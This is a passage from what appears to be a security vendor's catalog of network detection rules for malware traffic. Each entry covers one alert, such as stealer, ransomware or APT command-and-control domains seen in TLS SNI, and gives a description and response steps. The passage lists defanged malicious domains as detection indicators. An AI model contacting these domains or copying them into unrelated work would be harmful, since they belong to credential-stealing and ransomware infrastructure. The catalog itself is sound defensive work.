Handle as the other Targeted Attack alerts in this section: review the alert, establish how the user reached the site and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed TaurusStealer CnC Domain in TLS SNI

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host whose Server Name Indication (SNI) is a domain associated with TaurusStealer command-and-control (CnC) infrastructure; the title does not name the domain, so take it from the alert details. TaurusStealer is an information stealer, so a completed connection usually means harvested credentials and browser data were being sent out rather than a command being fetched.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, and check whether the handshake completed and data was sent. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password, and treat any credentials saved in browsers or applications on that host as compromised.

ET MALWARE Observed Thanatos Ransomware Variant Pico User-Agent

Description

This detection fires when Rapid7's Insight Network Sensor observes an HTTP request from a monitored host whose User-Agent header matches the one used by the Pico variant of Thanatos ransomware. The match is on a plaintext HTTP header, so it is only visible on unencrypted connections or where TLS is terminated upstream of the sensor. Ransomware typically makes this kind of request shortly before or during encryption, so speed matters.

Recommendation

Treat the alert as urgent: isolate the host from the network first, then review the alert, check whether files on the host or on shares it can reach have already been encrypted, and preserve the host for analysis if recovery keys may be needed. Rebuild the host from a known, good source, restore data from backups verified before the incident, and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed TrumpHead Ransomware CnC Domain (6bbsjnrzv2uvp7bp .onion .pet in TLS SNI)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host with 6bbsjnrzv2uvp7bp .onion .pet in the Server Name Indication (SNI), a name associated with TrumpHead ransomware command-and-control (CnC). The .onion .pet suffix shows the Tor hidden service being reached through a clearnet Tor2web-style gateway rather than over Tor itself, which is why the name appears in a plaintext SNI at all. Ransomware typically contacts its CnC shortly before or during encryption, so speed matters.

Recommendation

Treat the alert as urgent: isolate the host from the network first, then review the alert, check whether files on the host or on shares it can reach have already been encrypted, and preserve the host for analysis. Rebuild the host from a known, good source, restore data from backups verified before the incident, and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Turla/APT34 CnC Domain Domain (dubaiexpo2020 .cf in TLS SNI)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host with dubaiexpo2020 .cf in the Server Name Indication (SNI), a domain the rule attributes to Turla/APT34 command-and-control (CnC) infrastructure. The name mimics a real-world event, a common lure pattern; the SNI is sent in cleartext, so the alert shows the attempt to reach the domain but not what was exchanged.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, and check whether the handshake completed and data was exchanged. Given the attribution to a state-sponsored actor, if the activity is confirmed malicious, isolate the host, preserve it for analysis, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed Turla Domain (vision2030 .tk in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with vision2030 .tk in the SNI, a domain associated with Turla activity; as with dubaiexpo2020 .cf above, the name is themed on a real-world initiative to look plausible.

Recommendation

Handle as the Turla/APT34 alert above: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, isolate and preserve the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed Unk.PowerShell Loader CnC Domain in TLS SNI

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host whose Server Name Indication (SNI) is a domain associated with an unattributed ("Unk.") PowerShell-based loader's command-and-control (CnC) infrastructure; the title does not name the domain, so take it from the alert details. A loader's job is to fetch and run a further payload, so the connection may be followed by other alerts for whatever it delivered.

Recommendation

Review the alert in question: identify the source host and the PowerShell process that opened the connection, and look at PowerShell script block or command-line logging on the host for the loader itself. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed Upatre CnC Domain in TLS SNI

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host whose Server Name Indication (SNI) is a domain associated with Upatre command-and-control (CnC) infrastructure; the title does not name the domain, so take it from the alert details. Upatre is a downloader, typically delivered by email attachment, whose purpose is to retrieve other malware, so a completed connection suggests a second payload may already be on the host.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, and check for recently written executables and for further alerts from the same host. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed Ursnif CnC Domain (Gloderuniok .website in TLS SNI)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host with Gloderuniok .website in the Server Name Indication (SNI), a domain associated with Ursnif (Gozi) command-and-control (CnC) infrastructure. Ursnif is a banking trojan that steals credentials and injects into browser sessions, so the affected user's online banking and other web credentials are at risk. The SNI is sent in cleartext, so the alert shows the attempt to reach the domain but not what was exchanged.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, and check whether the handshake completed and data was exchanged. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password and any web or banking credentials used from that host.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE Observed Ursnif CnC Domain (Vloderuniok .website in TLS SNI)

Description

This detection fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host with Vloderuniok .website in the SNI, another Ursnif CnC domain (note the one-letter difference from Gloderuniok .website above); the match works the same way.

Recommendation

Handle as the Gloderuniok .website alert above: review the alert, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password and any web or banking credentials used from that host.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE Observed Ursnif Domain in TLS SNI

Description

This title is shared by more than one rule in the catalog; their text is identical, so they are listed here once. Each fires when the Insight Network Sensor observes a TLS ClientHello from a monitored host whose SNI is a domain associated with Ursnif activity. The title does not name the domain, so take it from the alert details.

Recommendation

Handle as the other Ursnif alerts in this section: review the alert, note the matched domain, identify the process behind the connection and, if the activity is confirmed malicious, rebuild the host from a known, good source and have the user change their password and any web or banking credentials used from that host.

ET MALWARE Observed VikroStealer CnC Domain in TLS SNI

Description

This title is shared by more than one rule in the catalog; their text is identical, so they are listed here once. Each fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host whose Server Name Indication (SNI) is a domain associated with VikroStealer command-and-control (CnC) infrastructure; the title does not name the domain, so take it from the alert details. VikroStealer is an information stealer, so a completed connection usually means harvested credentials and browser data were being sent out.

Recommendation

Review the alert in question: note the matched domain, identify the source host and the process that opened the connection, and check whether the handshake completed and data was sent. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password, and treat any credentials saved in browsers or applications on that host as compromised.

ET MALWARE Observed Win32/CollectorStealer User-Agent M1

Description

This detection fires when Rapid7's Insight Network Sensor observes an HTTP request from a monitored host whose User-Agent header matches one of the patterns used by the Win32/CollectorStealer information stealer (M1 and M2 are two variants of the pattern). The match is on a plaintext HTTP header, so it is only visible on unencrypted connections or where TLS is terminated upstream of the sensor; a stealer's outbound requests typically carry harvested credentials and browser data.

Recommendation

Review the alert in question: identify the process that sent the request and what it posted. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password, and treat any credentials saved in browsers or applications on that host as compromised.

ET MALWARE Observed Win32/CollectorStealer User-Agent M2

Description

This detection fires when the Insight Network Sensor observes an HTTP request from a monitored host whose User-Agent header matches the second Win32/CollectorStealer pattern; see the M1 entry above.

Recommendation

Handle as the M1 alert above: review the alert, identify the process behind the request and, if the activity is confirmed malicious, rebuild the host from a known, good source, have the user change their password and treat credentials stored on the host as compromised.

ET MALWARE Observed Win32/DecryptStealer Exfil Domain (geroipanel .site in TLS SNI)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS ClientHello from a monitored host with geroipanel .site in the Server Name Indication (SNI), a domain used by the Win32/DecryptStealer information stealer for exfiltration. Because this is an exfiltration rather than a CnC domain, a completed handshake followed by outbound data almost certainly means stolen data has already left the host; the SNI itself is sent in cleartext, so the rule does not need decryption.

Recommendation

Review the alert in question: identify the source host and the process that opened the connection, and check the connection's byte counts to judge whether data was uploaded. If the activity is confirmed malicious, isolate the host, rebuild it from a known, good source and have the user change their password, and treat any credentials saved in browsers or applications on that host as compromised.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (annafraudy .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (attentionmagnet .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (belochkaneprihoditodna .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (birdmilk .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (blogsolutions .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (footballstar .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (genericalphabet .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (gimmegimmejimmy .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (gopstoporchestra .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (lomhasnopryiyome .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (mindbreaker .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (msresearchcenter .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (newageiscoming .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (number1g .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (number2g .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (realonlinetrend .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (stanculinaryblog .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (stockme .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (tapewormorchestra .top in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (whatsthescore .top in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (youareperfect2day .top in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer Domain (cheapfacechange .top in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer Domain (hellowoodie .top in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32/Wacapew.A!ml Domain in TLS SNI (zytrox .tk)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ZLoader CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE OceanLotus System Profiling JavaScript HTTP Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Octopus Malware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Octopus Malware CnC Server Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Octopus Malware CnC Server Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Octopus Malware Initial Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Office Macro Emotet Download URI Nov 24 2021

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Oficla Checkin (1)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Oficla Downloader Activity Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig APT PowDesk Powershell Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig OopsIE CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig OopsIE CnC Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig OopsIE CnC Checkin M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig QUADAGENT CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Oilrig Stealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OLDBAIT Checkin 2 brvc

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OLDBAIT Checkin sptr

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OneLouder Common URI Struct

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Onkods.A Downloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Baby Coin syschk CnC Communication

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Blockbuster User-Agent (Mozillar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Buhtrap CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Operation Cobra Venom WSF Stage 1 - CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Cobra Venom WSF Stage 1 - File Decode Completed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Cobra Venom WSF Stage 2 - CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation EvilTraffic Initial Redirect M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation EvilTraffic Initial Redirect M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Interception Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Operation Mystery Baby syschk CnC Communication

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation SpoofedScholars Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Optix Pro Trojan/Keylogger Reporting Installation via HTTP-Email Post

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Orca RAT URI Struct 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Orca RAT URI Struct 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Orca RAT URI Struct 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Orca RAT URI Struct 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OS X Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K first execution checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K/I reporting failed infection

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K/I reporting successful infection

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K/I reporting successful infection 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Flashback.K/I User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/GMERA.B CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/LamePyre Screenshot Upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Mami CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/MapperState CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Mokes.A CnC Heartbeat Request (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/NukeSped Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/OceanLotus.D Requesting Commands from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/OceanLotus.D Sending Data to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Proton.B Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Proton.C/D Domain (eltima .in in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Proton.C/D Domain (handbrake .cc in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Proton.C/D Domain (handbrakestore .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer CnC Activity M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer CnC Landing M2

Description

